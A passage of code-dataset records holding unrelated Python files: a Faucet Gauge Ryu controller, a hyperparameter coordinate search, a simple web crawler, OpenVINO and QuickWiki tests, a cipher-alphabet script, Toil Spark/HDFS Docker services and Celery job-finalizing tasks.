self.exc_logger = get_logger(\n self.exc_logname, self.exc_logfile, logging.CRITICAL, 1)\n\n # Set the signal handler for reloading config file\n signal.signal(signal.SIGHUP, self.signal_handler)\n\n # dict of watchers/handlers:\n # indexed by dp_id and then by name\n self.watchers = {}\n confs = watcher_parser(self.config_file, self.logname)\n for conf in confs:\n watcher = watcher_factory(conf)(conf, self.logname)\n self.watchers.setdefault(watcher.dp.dp_id, {})\n self.watchers[watcher.dp.dp_id][watcher.conf.type] = watcher\n # Create dpset object for querying Ryu's DPSet application\n self.dpset = kwargs['dpset']\n\n @set_ev_cls(dpset.EventDP, dpset.DPSET_EV_DISPATCHER)\n @kill_on_exception(exc_logname)\n def handler_connect_or_disconnect(self, ryu_event):\n ryu_dp = ryu_event.dp\n dp_id = ryu_dp.id\n if dp_id not in self.watchers:\n self.logger.info('no watcher configured for %s', dpid_log(dp_id))\n return\n\n if ryu_event.enter: # DP is connecting\n self.logger.info('%s up', dpid_log(dp_id))\n for watcher in self.watchers[dp_id].values():\n watcher.start(ryu_dp)\n else: # DP is disconnecting\n if ryu_dp.id in self.watchers:\n for watcher in self.watchers[dp_id].values():\n watcher.stop()\n del self.watchers[dp_id]\n self.logger.info('%s down', dpid_log(dp_id))\n\n def signal_handler(self, sigid, frame):\n if sigid == 
signal.SIGHUP:\n            self.send_event('Gauge', EventGaugeReconfigure())\n\n    @set_ev_cls(EventGaugeReconfigure, MAIN_DISPATCHER)\n    def reload_config(self, ryu_event):\n        self.config_file = os.getenv('GAUGE_CONFIG', self.config_file)\n\n        new_confs = watcher_parser(self.config_file, self.logname)\n        new_watchers = {}\n        for conf in new_confs:\n            watcher = watcher_factory(conf)(conf, self.logname)\n            new_watchers.setdefault(watcher.dp.dp_id, {})\n            new_watchers[watcher.dp.dp_id][watcher.conf.type] = watcher\n\n        for dp_id, watchers in self.watchers.items():\n            for watcher_type, watcher in list(watchers.items()):\n                try:\n                    new_watcher = new_watchers[dp_id][watcher_type]\n                    self.watchers[dp_id][watcher_type] = new_watcher\n                except KeyError:\n                    # no replacement configured: drop the old watcher\n                    new_watcher = None\n                    del self.watchers[dp_id][watcher_type]\n                if watcher.running():\n                    watcher.stop()\n                    if new_watcher is not None:\n                        new_watcher.start(self.dpset.get(dp_id))\n\n    @set_ev_cls(dpset.EventDPReconnected, dpset.DPSET_EV_DISPATCHER)\n    @kill_on_exception(exc_logname)\n    def handler_reconnect(self, ryu_event):\n        ryu_dp = ryu_event.dp\n        self.logger.info('%s reconnected', dpid_log(ryu_dp.id))\n        for watcher in self.watchers[ryu_dp.id].values():\n            watcher.start(ryu_dp)\n\n    def update_watcher(self, dp_id, name, msg):\n        rcv_time = time.time()\n        if dp_id in self.watchers and name in self.watchers[dp_id]:\n            self.watchers[dp_id][name].update(rcv_time, msg)\n\n    @set_ev_cls(ofp_event.EventOFPPortStatus, MAIN_DISPATCHER) # pylint: disable=no-member\n    @kill_on_exception(exc_logname)\n    def port_status_handler(self, ryu_event):\n        self.update_watcher(ryu_event.msg.datapath.id, 'port_state', ryu_event.msg)\n\n    @set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER) # pylint: disable=no-member\n    @kill_on_exception(exc_logname)\n    def port_stats_reply_handler(self, ryu_event):\n        self.update_watcher(ryu_event.msg.datapath.id, 'port_stats', ryu_event.msg)\n\n    @set_ev_cls(ofp_event.EventOFPFlowStatsReply, MAIN_DISPATCHER) # pylint: disable=no-member\n    @kill_on_exception(exc_logname)\n    def flow_stats_reply_handler(self, ryu_event):\n        self.update_watcher(ryu_event.msg.datapath.id, 'flow_table', ryu_event.msg)\n","sub_path":"src/ryu_faucet/org/onfsdn/faucet/gauge.py","file_name":"gauge.py","file_ext":"py","file_size_in_byte":6302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"81549650","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.5 (62131)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.5-i386/egg/quickwiki/tests/functional/test_pages.py\n# Compiled at: 2009-02-23 12:50:50\nfrom quickwiki.tests import *\n\nclass TestPagesController(TestController):\n\n    def test_index(self):\n        response = self.app.get(url(controller='pages', action='index'))\n        self.assert_('Title List' in response)\n        self.assert_('FrontPage' in response)","sub_path":"pycfiles/QuickWiki-0.1.6-py2.5/test_pages.py","file_name":"test_pages.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"448928603","text":"from typing import Union\nfrom ..search import HyperOpt\nfrom ..spaces import GridSpace\nimport numpy as np\nfrom rich.console import Console\n\n\nclass CoordinateSearch(HyperOpt):\n    def __init__(\n        self,\n        real: Union[dict, None] = None,\n        integer: Union[dict, None] = None,\n        categorical: Union[dict, None] = None,\n        search_config: dict = {},\n        maximize_objective: bool = False,\n        fixed_params: Union[dict, None] = None,\n        reload_path: Union[str, 
None] = None,\n        reload_list: Union[list, None] = None,\n        seed_id: int = 42,\n        verbose: bool = False,\n    ):\n        HyperOpt.__init__(\n            self,\n            real,\n            integer,\n            categorical,\n            search_config,\n            maximize_objective,\n            fixed_params,\n            reload_path,\n            reload_list,\n            seed_id,\n            verbose,\n        )\n        self.evals_per_coord = [0]\n        var_counter = 0\n        for k in self.search_config[\"order\"]:\n            if self.real is not None:\n                if k in self.real.keys():\n                    self.evals_per_coord.append(self.real[k][\"bins\"] + var_counter)\n                    var_counter += 1\n\n            if self.integer is not None:\n                if k in self.integer.keys():\n                    self.evals_per_coord.append(self.integer[k][\"bins\"] + var_counter)\n                    var_counter += 1\n\n            if self.categorical is not None:\n                if k in self.categorical.keys():\n                    self.evals_per_coord.append(len(self.categorical[k]) + var_counter)\n                    var_counter += 1\n        self.range_per_coord = np.cumsum(self.evals_per_coord)\n\n        # Sequentially set-up different grid spaces - initialize 1st one\n        self.grid_var_counter = 0\n        self.var_counter = 0\n        self.construct_active_space()\n        self.search_name = \"Coordinate-Wise Search\"\n\n        # Add start-up message printing the search space\n        if self.verbose:\n            self.print_hello()\n\n    def ask_search(self, batch_size: int):\n        \"\"\"Get proposals to eval next (in batches) - Coordinate Search\"\"\"\n        # Set grid counter to eval_counter in order to ensure that\n        # results for the grid configuration are collected before continuation\n        self.grid_var_counter = (\n            self.eval_counter - self.range_per_coord[self.var_counter]\n        )\n\n        param_batch = []\n        # Sample a new configuration for each eval in the batch\n        while len(param_batch) < batch_size and self.grid_var_counter < len(self.space):\n            # Get parameter batch from the grid\n            proposal_params = self.space.param_grid[self.grid_var_counter]\n            if proposal_params not in (self.all_evaluated_params + param_batch):\n                # Add parameter proposal to the batch list\n                param_batch.append(proposal_params)\n                self.grid_var_counter += 1\n            else:\n                # Otherwise continue sampling proposals\n                self.grid_var_counter += 1\n                continue\n        return param_batch\n\n    def tell_search(self, batch_proposals: list, perf_measures: list):\n        \"\"\"Update search log data - Coordinate Search\"\"\"\n        # Update/reset variable and grid counter based on eval_counter\n        # And evals per search space (makes it easier to reload)\n        self.grid_var_counter = (\n            self.eval_counter - self.range_per_coord[self.var_counter]\n        )\n        if self.grid_var_counter >= len(self.space) - self.var_counter:\n            self.var_counter += 1\n            if self.var_counter < len(self.search_config[\"order\"]):\n                self.construct_active_space()\n                self.grid_var_counter = 0\n\n    def construct_active_space(self):\n        \"\"\"Construct the active search space.\"\"\"\n        # Update the parameter defaults with the best performers\n        if self.eval_counter > 0:\n            idx, config, eval = self.get_best()\n            for k, v in config.items():\n                if k == self.search_config[\"order\"][self.var_counter - 1]:\n                    self.search_config[\"defaults\"][k] = v\n                    if self.verbose:\n                        Console().log(f\"Fixed `{k}` hyperparameter to {v}.\")\n\n        # Increase active variable counter and reset grid counter\n        self.active_var = self.search_config[\"order\"][self.var_counter]\n        if self.verbose:\n            Console().log(f\"New active variable `{self.active_var}`.\")\n\n        # Create new grid search space - if fixed: Create categorical\n        # Note: Only one variable is 'active' at every time\n        real_sub, integer_sub, categorical_sub = {}, {}, {}\n        if self.real is not None:\n            for k in self.real.keys():\n                if k == self.active_var:\n                    real_sub[k] = 
self.real[k]\n                else:\n                    categorical_sub[k] = [self.search_config[\"defaults\"][k]]\n\n        if self.integer is not None:\n            for k in self.integer.keys():\n                if k == self.active_var:\n                    integer_sub[k] = self.integer[k]\n                else:\n                    categorical_sub[k] = [self.search_config[\"defaults\"][k]]\n\n        if self.categorical is not None:\n            for k in self.categorical.keys():\n                if k == self.active_var:\n                    categorical_sub[k] = self.categorical[k]\n                else:\n                    categorical_sub[k] = [self.search_config[\"defaults\"][k]]\n\n        # Construct new grid space with fixed coordinates!\n        self.space = GridSpace(real_sub, integer_sub, categorical_sub)\n","sub_path":"mle_hyperopt/strategies/coordinate.py","file_name":"coordinate.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"455938897","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom urllib import request\nimport urllib\n\nfrom collections import deque\n\nSq = deque()\nVis = set()\n\n\nurlst = [ \"https://www.yandex.com/\",\n          \"http://www.baidu.com\",\n          \"http://www.1688.com\",\n          \"https://www.zhihu.com/question/20271508\",\n          \"http://www.cnblogs.com/wupeiqi/articles/4731930.html\",\n          \"http://www.baidu.com/s?\",\n          'http://news.dbanotes.net'\n          ]\n\nSq.append( urlst[6] )\ncnt = 0\ncount_Sq = 1\nRurl = open( 'Result_JN_2.txt', '+w' )\nRurl.write( '\\n\\n' )\nS = ''\nwhile Sq:\n    url = Sq.popleft()\n    Vis.add( url )\n    count_Sq -= 1\n\n    print( ' Already Spidered:' + str( cnt ) + '   Spidering ----> ' + url )\n    print( 'Url Numbers In The Q: ', count_Sq )\n    if len( url ) > 50:\n        print( '>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>' )\n        print( url )\n        continue\n    try:\n        Op = request.urlopen( url )\n        cnt += 1\n        \n        if 'html' not in Op.getheader( 'Content-Type' ):\n            #sf:log >>>>add logging common\n            continue\n        try:\n            Dt_t = Op.read().decode( 'utf-8' )\n            Dt = Dt_t.encode( encoding = 'gbk', errors = 'backslashreplace' )\n        except Exception as e:\n            #sf: log\n            continue\n        Lkre = re.compile( 'href=\"(.+?)\"' )\n        Lkt = Lkre.findall( Dt_t ) \n        for x in Lkt:\n            if 'http' in x and x not in Vis:\n                Sq.append(x)\n                Vis.add( x )\n                Rurl.write( x + '\\n' )\n                count_Sq += 1\n                if not count_Sq % 100:\n                    S = input( 'Press N to STOP:\\n' )\n                print( 'Adding into the Q----> ' + x )\n\n        if S == 'N':\n            break\n    except Exception as e:\n        print( e ) \n        Error = input( 'Error Press:\\n' )\n        #sf: log \n        continue\nRurl.close()\n\n    \n\n\n\nqueue = deque( [ 'Eric', 'John', 'Michael' ] )\nqueue.append( 'Terry' )\nqueue.append( 'Graham' )\nqueue.popleft()\nqueue.popleft()\nqueue\n\n","sub_path":"JN_21.py","file_name":"JN_21.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"282344213","text":"# ==============================================================================\n# Copyright (C) 2021 Intel Corporation\n\n# SPDX-License-Identifier: Apache-2.0\n# ==============================================================================\n\"\"\"Openvino Tensorflow test for checking backend setting using rewriter config for grappler\n\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport pytest\nimport os\nimport numpy as np\nimport shutil\nimport tensorflow as tf\ntf.compat.v1.disable_eager_execution()\nfrom tensorflow.core.protobuf import rewriter_config_pb2\nimport openvino_tensorflow\n\nfrom common import NgraphTest\n\n\nclass TestRewriterConfigBackendSetting(NgraphTest):\n\n    
@pytest.mark.skipif(\n not openvino_tensorflow.is_grappler_enabled(),\n reason='Rewriter config only works for grappler path')\n def test_config_updater_api(self):\n dim1 = 3\n dim2 = 4\n a = tf.compat.v1.placeholder(tf.float32, shape=(dim1, dim2), name='a')\n x = tf.compat.v1.placeholder(tf.float32, shape=(dim1, dim2), name='x')\n b = tf.compat.v1.placeholder(tf.float32, shape=(dim1, dim2), name='y')\n axpy = (a * x) + b\n\n config = tf.compat.v1.ConfigProto()\n rewriter_options = rewriter_config_pb2.RewriterConfig()\n rewriter_options.meta_optimizer_iterations = (\n rewriter_config_pb2.RewriterConfig.ONE)\n rewriter_options.min_graph_nodes = -1\n ovtf_optimizer = rewriter_options.custom_optimizers.add()\n ovtf_optimizer.name = \"ovtf-optimizer\"\n config.MergeFrom(\n tf.compat.v1.ConfigProto(\n graph_options=tf.compat.v1.GraphOptions(\n rewrite_options=rewriter_options)))\n\n with tf.compat.v1.Session(config=config) as sess:\n outval = sess.run(\n axpy,\n feed_dict={\n a: 1.5 * np.ones((dim1, dim2)),\n b: np.ones((dim1, dim2)),\n x: np.ones((dim1, dim2))\n })\n assert (outval == 2.5 * (np.ones((dim1, dim2)))).all()\n","sub_path":"test/python/test_rewriter_config_setting.py","file_name":"test_rewriter_config_setting.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"262156475","text":"\"\"\"I am particularly proud of this program, it allows you to pick a codeword, then the program will\r\ncreate a string of letters to be used as a reference to encipher your information.\"\"\"\r\n\r\n\r\n\r\ncWord = input('Cypher Word? ***ALL CAPS PLEASE***> ')\r\ncodeWord = list(cWord) #makes the codeword a list to be used\r\ncodeWord = list(dict.fromkeys(codeWord)) #removes the duplicate letters from the codeword\r\nLETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\r\nLETTERS = list(dict.fromkeys(LETTERS))\r\ncodeWordset = set(codeWord)\r\nLETTERSset = set(LETTERS)\r\nalphaList = list(LETTERSset - codeWordset) #removes the codeword from the alphabet\r\nalphaList.sort() #puts the remaining alphabet words into alphabetical order\r\ncypherStrip = codeWord + alphaList #adds your codeword to the beginning of the alphabet\r\nprint(cypherStrip) \r\n\r\ncypherStripstr = cypherStrip #creates a string for the main program\r\ncStrip = \"\"\r\nfor x in cypherStripstr:\r\n cStrip += x\r\n\r\nprint(cStrip)\r\n","sub_path":"CStrip.py","file_name":"CStrip.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"163187970","text":"# Copyright (C) 2016 UCSC Computational Genomics Lab\n# Copyright (C) 2016 UC Berkeley AMPLab\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport logging\nimport multiprocessing\nimport os\nimport subprocess\nimport time\n\nfrom toil.job import Job\n\n_log = logging.getLogger(__name__)\n_SPARK_MASTER_PORT = \"7077\"\n\ndef spawn_spark_cluster(job,\n sudo,\n numWorkers,\n cores=None,\n memory=None,\n disk=None,\n 
overrideLeaderIP=None):\n '''\n :param sudo: Whether this code should run docker containers with sudo.\n :param numWorkers: The number of worker nodes to have in the cluster. \\\n Must be greater than or equal to 1.\n :param cores: Optional parameter to set the number of cores per node. \\\n If not provided, we use the number of cores on the node that launches \\\n the service.\n :param memory: Optional parameter to set the memory requested per node.\n :param disk: Optional parameter to set the disk requested per node.\n :type sudo: boolean\n :type leaderMemory: int or string convertable by bd2k.util.humanize.human2bytes to an int\n :type numWorkers: int\n :type cores: int\n :type memory: int or string convertable by bd2k.util.humanize.human2bytes to an int\n :type disk: int or string convertable by bd2k.util.humanize.human2bytes to an int\n '''\n\n if numWorkers < 1:\n raise ValueError(\"Must have more than one worker. %d given.\" % numWorkers)\n\n leaderService = SparkService(sudo,\n cores=cores,\n memory=memory,\n disk=disk,\n overrideLeaderIP=overrideLeaderIP)\n leaderIP = job.addService(leaderService)\n for i in range(numWorkers):\n job.addService(WorkerService(leaderIP,\n sudo,\n cores=cores,\n disk=disk,\n memory=memory),\n parentService=leaderService)\n\n return leaderIP\n\n#\n# FIXME: Where should this go?\n# See discussion in https://github.com/BD2KGenomics/toil-scripts/pull/190.\n# @benedictpaten thinks this should go in toil. If so, where in toil?\n#\n# @jvivian has been tagged to resolve this at a later point in time\n#\ndef _docker_call(work_dir,\n tool_parameters,\n tool,\n java_opts=None,\n outfile=None,\n sudo=False,\n docker_parameters=None,\n check_output=False,\n no_rm=False):\n \"\"\"\n Makes subprocess call of a command to a docker container.\n\n tool_parameters: list An array of the parameters to be passed to the tool\n tool: str Name of the Docker image to be used (e.g. quay.io/ucsc_cgl/samtools)\n java_opts: str Optional commands to pass to a java jar execution. (e.g. '-Xmx15G')\n outfile: file Filehandle that stderr will be passed to\n sudo: bool If the user wants the docker command executed as sudo\n \"\"\"\n rm = '--rm'\n if no_rm:\n rm = ''\n\n base_docker_call = ('docker run %s --log-driver=none -v %s:/data' % (rm, work_dir)).split()\n\n if sudo:\n base_docker_call = ['sudo'] + base_docker_call\n if java_opts:\n base_docker_call = base_docker_call + ['-e', 'JAVA_OPTS={}'.format(java_opts)]\n if docker_parameters:\n base_docker_call = base_docker_call + docker_parameters\n\n _log.warn(\"Calling docker with %s.\" % \" \".join(base_docker_call + [tool] + tool_parameters))\n\n try:\n if outfile:\n subprocess.check_call(base_docker_call + [tool] + tool_parameters, stdout=outfile)\n else:\n if check_output:\n return subprocess.check_output(base_docker_call + [tool] + tool_parameters)\n else:\n subprocess.check_call(base_docker_call + [tool] + tool_parameters)\n\n except subprocess.CalledProcessError:\n raise RuntimeError('docker command returned a non-zero exit status. Check error logs.')\n except OSError:\n raise RuntimeError('docker not found on system. 
Install on all nodes.')\n\n\ndef _checkContainerStatus(sparkContainerID,\n                          hdfsContainerID,\n                          sparkNoun='leader',\n                          hdfsNoun='namenode'):\n\n    containers = subprocess.check_output([\"docker\", \"ps\", \"-q\"])\n\n    # docker ps emits shortened versions of the hash\n    # these shortened hashes are 12 characters long\n    shortSpark = sparkContainerID[0:11]\n    shortHdfs = hdfsContainerID[0:11]\n\n    if ((sparkContainerID not in containers and\n         shortSpark not in containers) or\n        (hdfsContainerID not in containers and\n         shortHdfs not in containers)):\n        raise RuntimeError('Lost both Spark %s and HDFS %s.' % (sparkNoun, hdfsNoun))\n    elif sparkContainerID not in containers and shortSpark not in containers:\n        raise RuntimeError('Lost Spark %s.' % sparkNoun)\n    elif hdfsContainerID not in containers and shortHdfs not in containers:\n        raise RuntimeError('Lost HDFS %s.' % hdfsNoun)\n    else:\n        return True\n    \n\nclass SparkService(Job.Service):\n    \"\"\"\n    A Service job that spins up a Spark cluster that child jobs can then attach\n    to. If the job that spawns this job is run with `checkpoint = True`, then\n    this service will robustly restart the Spark cluster upon the loss of any\n    nodes in the cluster.\n    \"\"\"\n\n    def __init__(self,\n                 sudo,\n                 memory=None,\n                 disk=None,\n                 cores=None,\n                 overrideLeaderIP=None):\n        \"\"\"\n        :param sudo: Whether this code should run docker containers with sudo.\n        :param memory: The amount of memory to be requested for the Spark leader. Optional.\n        :param disk: The amount of disk to be requested for the Spark leader. Optional.\n        :param cores: Optional parameter to set the number of cores per node. \\\n        If not provided, we use the number of cores on the node that launches \\\n        the service.\n        :type sudo: boolean\n        :type memory: int or string convertable by bd2k.util.humanize.human2bytes to an int\n        :type disk: int or string convertable by bd2k.util.humanize.human2bytes to an int\n        :type cores: int\n        \"\"\"\n        self.sudo = sudo\n\n        if cores is None:\n            cores = multiprocessing.cpu_count()\n\n        self.hostname = overrideLeaderIP\n\n        Job.Service.__init__(self, memory=memory, cores=cores, disk=disk)\n\n\n    def start(self, fileStore):\n        \"\"\"\n        Start spark and hdfs master containers\n\n        :param fileStore: Unused\n        \"\"\"\n\n        if self.hostname is None:\n            self.hostname = subprocess.check_output([\"hostname\", \"-f\",])[:-1]\n\n        _log.info(\"Started Spark master container.\")\n        self.sparkContainerID = _docker_call(no_rm = True,\n                                             work_dir = os.getcwd(),\n                                             tool = \"quay.io/ucsc_cgl/apache-spark-master:1.5.2\",\n                                             docker_parameters = [\"--net=host\",\n                                                                  \"-d\",\n                                                                  \"-v\", \"/mnt/ephemeral/:/ephemeral/:rw\",\n                                                                  \"-e\", \"SPARK_MASTER_IP=\"+self.hostname,\n                                                                  \"-e\", \"SPARK_LOCAL_DIRS=/ephemeral/spark/local\",\n                                                                  \"-e\", \"SPARK_WORKER_DIR=/ephemeral/spark/work\"],\n                                             tool_parameters = [self.hostname],\n                                             sudo = self.sudo,\n                                             check_output = True)[:-1]\n        _log.info(\"Started HDFS Datanode.\")\n        self.hdfsContainerID = _docker_call(no_rm = True,\n                                            work_dir = os.getcwd(),\n                                            tool = \"quay.io/ucsc_cgl/apache-hadoop-master:2.6.2\",\n                                            docker_parameters = [\"--net=host\",\n                                                                 \"-d\"],\n                                            tool_parameters = [self.hostname],\n                                            sudo = self.sudo,\n                                            check_output = True)[:-1]\n\n        return self.hostname\n\n\n    def stop(self, fileStore):\n        \"\"\"\n        Stop and remove spark and hdfs master containers\n\n        fileStore: Unused\n        \"\"\"\n\n        sudo = []\n        if self.sudo:\n            sudo = [\"sudo\"]\n        \n        subprocess.call(sudo + [\"docker\", \"exec\", self.sparkContainerID, \"rm\", \"-r\", \"/ephemeral/spark\"])\n        subprocess.call(sudo + [\"docker\", \"stop\", 
self.sparkContainerID])\n        subprocess.call(sudo + [\"docker\", \"rm\", self.sparkContainerID])\n        _log.info(\"Stopped Spark master.\")\n\n        subprocess.call(sudo + [\"docker\", \"stop\", self.hdfsContainerID])\n        subprocess.call(sudo + [\"docker\", \"rm\", self.hdfsContainerID])\n        _log.info(\"Stopped HDFS namenode.\")\n\n        return\n\n\n    def check(self):\n        \"\"\"\n        Checks to see if Spark master and HDFS namenode are still running.\n        \"\"\"\n        \n        status = _checkContainerStatus(self.sparkContainerID, self.hdfsContainerID)\n\n        return status\n\nclass WorkerService(Job.Service):\n    \"\"\"\n    Service Job that implements the worker nodes in a Spark/HDFS cluster.\n    Should not be called outside of `SparkService`.\n    \"\"\"\n    \n    def __init__(self, masterIP, sudo, memory=None, cores=None, disk=None):\n        \"\"\"\n        :param sudo: Whether this code should run docker containers with sudo.\n        :param memory: The memory requirement for each node in the cluster. Optional.\n        :param disk: The disk requirement for each node in the cluster. Optional.\n        :param cores: Optional parameter to set the number of cores per node. \\\n        If not provided, we use the number of cores on the node that launches \\\n        the service.\n        :type sudo: boolean\n        :type memory: int or string convertable by bd2k.util.humanize.human2bytes to an int\n        :type disk: int or string convertable by bd2k.util.humanize.human2bytes to an int\n        :type cores: int\n        \"\"\"\n\n        self.masterIP = masterIP\n        self.sudo = sudo\n\n        if cores is None:\n            cores = multiprocessing.cpu_count()\n        \n        Job.Service.__init__(self, memory=memory, cores=cores, disk=disk)\n\n\n    def start(self, fileStore):\n        \"\"\"\n        Start spark and hdfs worker containers\n\n        :param fileStore: Unused\n        \"\"\"\n\n        # start spark and our datanode\n        self.sparkContainerID = _docker_call(no_rm = True,\n                                             work_dir = os.getcwd(),\n                                             tool = \"quay.io/ucsc_cgl/apache-spark-worker:1.5.2\",\n                                             docker_parameters = [\"--net=host\", \n                                                                  \"-d\",\n                                                                  \"-v\", \"/mnt/ephemeral/:/ephemeral/:rw\",\n                                                                  \"-e\", \"\\\"SPARK_MASTER_IP=\"+self.masterIP+\":\"+_SPARK_MASTER_PORT+\"\\\"\",\n                                                                  \"-e\", \"SPARK_LOCAL_DIRS=/ephemeral/spark/local\",\n                                                                  \"-e\", \"SPARK_WORKER_DIR=/ephemeral/spark/work\"],\n                                             tool_parameters = [self.masterIP+\":\"+_SPARK_MASTER_PORT],\n                                             sudo = self.sudo,\n                                             check_output = True)[:-1]\n        self.__start_datanode()\n        \n        # fake do/while to check if HDFS is up\n        hdfs_down = True\n        retries = 0\n        while hdfs_down and (retries < 5):\n\n            _log.info(\"Sleeping 30 seconds before checking HDFS startup.\")\n            time.sleep(30)\n            clusterID = \"\"\n            try:\n                clusterID = subprocess.check_output([\"docker\",\n                                                     \"exec\",\n                                                     self.hdfsContainerID,\n                                                     \"grep\",\n                                                     \"clusterID\",\n                                                     \"-R\",\n                                                     \"/opt/apache-hadoop/logs\"])\n            except:\n                # grep returns a non-zero exit code if the pattern is not found\n                # we expect to not find the pattern, so a non-zero code is OK\n                pass\n\n            if \"Incompatible\" in clusterID:\n                _log.warning(\"Hadoop Datanode failed to start with: %s\", clusterID)\n                _log.warning(\"Retrying container startup, retry #%d.\", retries)\n                retries += 1\n\n                _log.warning(\"Removing ephemeral hdfs directory.\")\n                subprocess.check_call([\"docker\",\n                                       \"exec\",\n                                       self.hdfsContainerID,\n                                       \"rm\",\n                                       \"-rf\",\n                                       \"/ephemeral/hdfs\"])\n\n                _log.warning(\"Killing container %s.\", self.hdfsContainerID)\n                subprocess.check_call([\"docker\",\n                                       \"kill\",\n                                       self.hdfsContainerID])\n\n                # todo: this is copied code. 
clean up!\n _log.info(\"Restarting datanode.\")\n self.__start_datanode()\n\n else:\n _log.info(\"HDFS datanode started up OK!\")\n hdfs_down = False\n\n if retries >= 5:\n raise RuntimeError(\"Failed %d times trying to start HDFS datanode.\" % retries)\n\n return\n\n\n def __start_datanode(self):\n \"\"\"\n Launches the Hadoop datanode.\n \"\"\"\n self.hdfsContainerID = _docker_call(no_rm = True,\n work_dir = os.getcwd(),\n tool = \"quay.io/ucsc_cgl/apache-hadoop-worker:2.6.2\",\n docker_parameters = [\"--net=host\",\n \"-d\",\n \"-v\", \"/mnt/ephemeral/:/ephemeral/:rw\"],\n tool_parameters = [self.masterIP],\n sudo = self.sudo,\n check_output = True)[:-1]\n\n\n def stop(self, fileStore):\n \"\"\"\n Stop spark and hdfs worker containers\n\n :param fileStore: Unused\n \"\"\"\n\n sudo = []\n if self.sudo:\n sudo = ['sudo']\n\n subprocess.call(sudo + [\"docker\", \"exec\", self.sparkContainerID, \"rm\", \"-r\", \"/ephemeral/spark\"])\n subprocess.call(sudo + [\"docker\", \"stop\", self.sparkContainerID])\n subprocess.call(sudo + [\"docker\", \"rm\", self.sparkContainerID])\n _log.info(\"Stopped Spark worker.\")\n\n subprocess.call(sudo + [\"docker\", \"exec\", self.hdfsContainerID, \"rm\", \"-r\", \"/ephemeral/hdfs\"])\n subprocess.call(sudo + [\"docker\", \"stop\", self.hdfsContainerID])\n subprocess.call(sudo + [\"docker\", \"rm\", self.hdfsContainerID])\n _log.info(\"Stopped HDFS datanode.\")\n\n return\n\n\n def check(self):\n \"\"\"\n Checks to see if Spark worker and HDFS datanode are still running.\n \"\"\"\n\n status = _checkContainerStatus(self.sparkContainerID,\n self.hdfsContainerID,\n sparkNoun='worker',\n hdfsNoun='datanode')\n \n return status\n","sub_path":"src/toil/lib/spark.py","file_name":"spark.py","file_ext":"py","file_size_in_byte":16657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"452878031","text":"import celery\nfrom ptmworker.helpers import upload_helpers\nfrom ptmscout.database import experiment, modifications, jobs\nfrom ptmscout.config import strings, settings\nfrom ptmscout.utils import mail\n\n@celery.task\n@upload_helpers.transaction_task\ndef finalize_batch_annotate_job(stats, job_id):\n protein_cnt, error_cnt = stats\n job = jobs.getJobById(job_id)\n job.finish()\n job.save()\n \n subject = strings.batch_annotation_finished_subject\n message = strings.batch_annotation_finished_message % (job.name, protein_cnt, error_cnt, job.result_url)\n \n mail.celery_send_mail([job.user.email], subject, message)\n\n@celery.task\n@upload_helpers.transaction_task\ndef finalize_experiment_export_job(job_id):\n job = jobs.getJobById(job_id)\n job.finish()\n job.save()\n \n subject = strings.experiment_export_finished_subject\n message = strings.experiment_export_finished_message % (job.name, job.result_url)\n \n mail.celery_send_mail([job.user.email], subject, message)\n\n@celery.task\n@upload_helpers.transaction_task\ndef finalize_mcam_export_job(job_id):\n job = jobs.getJobById(job_id)\n job.finish()\n job.save()\n \n subject = strings.mcam_enrichment_finished_subject\n message = strings.mcam_enrichment_finished_message % (job.name, job.result_url)\n \n mail.celery_send_mail([job.user.email], subject, message)\n\n@celery.task\n@upload_helpers.transaction_task\ndef finalize_experiment_import(exp_id):\n exp = experiment.getExperimentById(exp_id, check_ready=False, secure=False)\n exp.job.finish()\n exp.job.save()\n\n peptides = modifications.countMeasuredPeptidesForExperiment(exp_id)\n proteins = 
modifications.countProteinsForExperiment(exp_id)\n exp_errors = experiment.countErrorsForExperiment(exp_id)\n\n error_log_url = \"%s/errors\" % (exp.job.result_url)\n \n subject = strings.experiment_upload_finished_subject\n message = strings.experiment_upload_finished_message % (exp.name, peptides, proteins, exp_errors, error_log_url)\n \n mail.celery_send_mail([exp.job.user.email], subject, message)\n\n@celery.task\n@upload_helpers.transaction_task\ndef finalize_annotation_upload_job(job_id, total, errors):\n job = jobs.getJobById(job_id)\n job.finish()\n job.save()\n \n subject = strings.annotation_upload_finished_subject\n message = strings.annotation_upload_finished_message % (job.name, total, len(errors), job.result_url)\n \n for err in errors:\n message += \"%s\\n\" % ( err )\n \n mail.celery_send_mail([job.user.email], subject, message)\n \n\n@celery.task\n@upload_helpers.transaction_task\ndef notify_job_failed(job_id, exc, stack_trace):\n job = jobs.getJobById(job_id)\n job.fail(stack_trace)\n job.save()\n \n subject = strings.job_failed_subject\n message = strings.job_failed_message % (job.name, job.stage, \"Exception: \" + str(exc), 